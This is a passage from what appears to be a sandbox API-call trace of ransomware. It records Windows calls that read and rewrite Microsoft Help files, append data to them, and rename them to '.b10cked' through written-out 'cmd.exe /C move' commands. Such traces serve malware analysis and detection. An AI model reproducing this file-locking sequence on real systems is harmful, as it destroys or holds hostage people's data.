lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.647] CloseHandle (hObject=0x120) returned 1 [0199.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN") returned 0x27 [0199.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | 
out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.649] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa14, dwThreadId=0xa48)) returned 1 [0199.660] CloseHandle (hObject=0x1b4) returned 1 [0199.660] CloseHandle (hObject=0x120) returned 1 [0199.660] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.660] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.660] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.661] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25645067534) returned 1 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.663] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.664] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.665] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, 
nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.665] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0199.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0199.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0199.669] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.669] CloseHandle (hObject=0x120) returned 1 [0199.670] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN") returned 0x27 [0199.671] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc84, dwThreadId=0x55c)) returned 1 [0199.759] CloseHandle (hObject=0x1b4) returned 1 [0199.759] CloseHandle (hObject=0x120) returned 1 [0199.759] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.759] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.759] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.759] ReleaseMutex (hMutex=0xf8) returned 1 [0199.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.759] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0199.760] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.760] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25665856239) returned 1 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.871] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.873] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.873] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, 
nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.873] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.873] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINWORD.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINWORD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.878] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.878] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 